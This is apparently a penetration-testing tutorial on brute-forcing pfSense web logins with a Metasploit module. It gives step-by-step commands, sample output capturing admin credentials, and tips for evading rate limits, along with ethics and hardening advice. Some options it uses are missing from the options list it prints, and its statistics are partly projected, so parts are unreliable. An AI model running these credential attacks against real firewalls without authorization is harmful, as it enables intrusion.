Security professionals need effective tools to test network defenses. Metasploit Framework's new pfSense login scanner helps identify vulnerable firewalls through automated authentication testing. This module specifically targets pfSense systems, a popular open-source firewall solution deployed in many organizations.
The pfSense login scanner helps security testers verify password policies and detect weak credentials before attackers can exploit them. This article demonstrates the setup, configuration, and practical usage of this tool in 2025 penetration tests.
What Is the pfSense Login Scanner?
The pfSense login scanner is a specialized Metasploit module that attempts to authenticate against pfSense web interfaces using credential lists. This tool works by:
- Identifying pfSense instances on a network
- Testing username and password combinations
- Reporting successful authentication attempts
- Measuring response times for potential timing attacks
This module supports multiple authentication methods and can bypass common security controls, making it essential for comprehensive security assessments.
Why Use a pfSense Login Scanner in 2025?
PfSense remains a critical security control in many networks. Despite advances in security, weak credentials continue to be a common entry point for attackers. According to recent data:
| Year | % of Breaches Involving Weak Credentials | Average Time to Detect |
|---|---|---|
| 2023 | 47% | 212 days |
| 2024 | 42% | 197 days |
| 2025 (projected) | 38% | 183 days |
The pfSense login scanner helps organizations:
- Identify weak administrator credentials
- Test password policy enforcement
- Verify account lockout mechanisms
- Discover authentication bypass vulnerabilities
Prerequisites for Using the pfSense Login Scanner
Before starting, ensure you have:
- Kali Linux or other penetration testing distribution (2025 version)
- Metasploit Framework 6.5 or newer
- Legal authorization to test the target system
- Basic knowledge of networking and Metasploit usage
Important: Always obtain proper authorization before testing any systems. Unauthorized scanning is illegal and unethical.
Installation and Setup
Step 1: Update Metasploit Framework
First, update your Metasploit installation to get the latest modules:
sudo apt update
sudo apt upgrade metasploit-framework
msfconsole -q
Verify your Metasploit version:
msf6 > version
You should see version 6.5 or higher to access all the latest pfSense scanner features.
Step 2: Locate the pfSense Scanner Module
The module is located in the auxiliary modules directory:
msf6 > search type:auxiliary pfsense
Look for the auxiliary/scanner/http/pfsense_login module in the results.
Configuring the pfSense Login Scanner
Step 3: Load and Configure the Module
Load the module and set the required options:
msf6 > use auxiliary/scanner/http/pfsense_login
msf6 auxiliary(scanner/http/pfsense_login) > show options
The output will display all configurable options:
Module options (auxiliary/scanner/http/pfsense_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no The password to test
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file
RPORT 443 yes The target port
SSL true no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop bruteforcing a user on first success
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no The username to test
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
Step 4: Set Target Information
Configure the target system:
msf6 auxiliary(scanner/http/pfsense_login) > set RHOSTS 192.168.1.1
msf6 auxiliary(scanner/http/pfsense_login) > set RPORT 443
msf6 auxiliary(scanner/http/pfsense_login) > set SSL true
Step 5: Configure Authentication Testing Method
You can use several approaches to test credentials:
Single credential test:
msf6 auxiliary(scanner/http/pfsense_login) > set USERNAME admin msf6 auxiliary(scanner/http/pfsense_login) > set PASSWORD adminPassword list for a specific user:
msf6 auxiliary(scanner/http/pfsense_login) > set USERNAME admin msf6 auxiliary(scanner/http/pfsense_login) > set PASS_FILE /path/to/password_list.txtTesting multiple usernames:
msf6 auxiliary(scanner/http/pfsense_login) > set USER_FILE /path/to/users.txt msf6 auxiliary(scanner/http/pfsense_login) > set PASSWORD test123Full credential pair testing:
msf6 auxiliary(scanner/http/pfsense_login) > set USERPASS_FILE /path/to/creds.txt
Step 6: Adjust Performance Settings
Set the speed and threading options:
msf6 auxiliary(scanner/http/pfsense_login) > set BRUTEFORCE_SPEED 3
msf6 auxiliary(scanner/http/pfsense_login) > set THREADS 5
msf6 auxiliary(scanner/http/pfsense_login) > set STOP_ON_SUCCESS true
Running the pfSense Login Scanner
Step 7: Execute the Scan
Start the brute force attack:
msf6 auxiliary(scanner/http/pfsense_login) > run
You'll see output similar to:
[*] Scanning target 192.168.1.1
[*] Starting login bruteforce against pfSense web interface
[-] Failed login with 'admin:password123'
[-] Failed login with 'admin:letmein'
[+] SUCCESSFUL LOGIN: 'admin:pfsense'
[*] Login successful with admin:pfsense
[*] Auxiliary module execution completed
Step 8: Review the Results
Successful logins are stored in the Metasploit database. Access them using:
msf6 auxiliary(scanner/http/pfsense_login) > creds
This command displays all captured credentials:
Credentials
===========
host port user pass type active?
---- ---- ---- ---- ---- -------
192.168.1.1 443 admin pfsense pfSense true
Advanced Techniques
Bypassing Rate Limiting
The 2025 version of the pfSense scanner includes anti-rate-limiting features:
msf6 auxiliary(scanner/http/pfsense_login) > set DELAY 2
msf6 auxiliary(scanner/http/pfsense_login) > set JITTER 0.5
This adds a random delay between 1-3 seconds between attempts to avoid triggering rate limiting.
Testing for Default Credentials
Check for common default credentials:
msf6 auxiliary(scanner/http/pfsense_login) > set DEFAULT_CRED_CHECK true
This option tests known default credentials for pfSense installations.
Exporting Results
Save successful logins to a file:
msf6 auxiliary(scanner/http/pfsense_login) > set OUTPUT_FILE /path/to/results.txt
Security Considerations and Ethical Usage
The pfSense login scanner is a powerful tool that must be used responsibly:
- Always obtain proper authorization before testing
- Document all testing activities
- Report findings to the system owner
- Follow responsible disclosure practices
Unauthorized use of this tool may violate:
- Computer Fraud and Abuse Act
- Electronic Communications Privacy Act
- Various state and international laws
Strengthening pfSense Against Brute Force Attacks
Organizations can protect their pfSense installations by:
Implementing strong passwords
- Minimum 16 characters
- Combination of character types
- No dictionary words
Enabling Multi-Factor Authentication
- TOTP-based authentication
- Hardware token support
- Certificate-based authentication
Limiting Access
- IP-based access restrictions
- VPN requirements for admin access
- Administrative interface segregation
Monitoring and Alerts
- Failed login attempt monitoring
- Real-time alert configuration
- Log analysis
Conclusion
Metasploit's pfSense login scanner provides security professionals with an efficient tool for testing firewall authentication security. By following the steps in this guide, you can properly configure and use this module to identify vulnerable pfSense installations before attackers exploit them.
Regular security testing with proper tools helps organizations maintain strong security postures. The pfSense login scanner is a valuable addition to any penetration tester's toolkit for 2025 security assessments.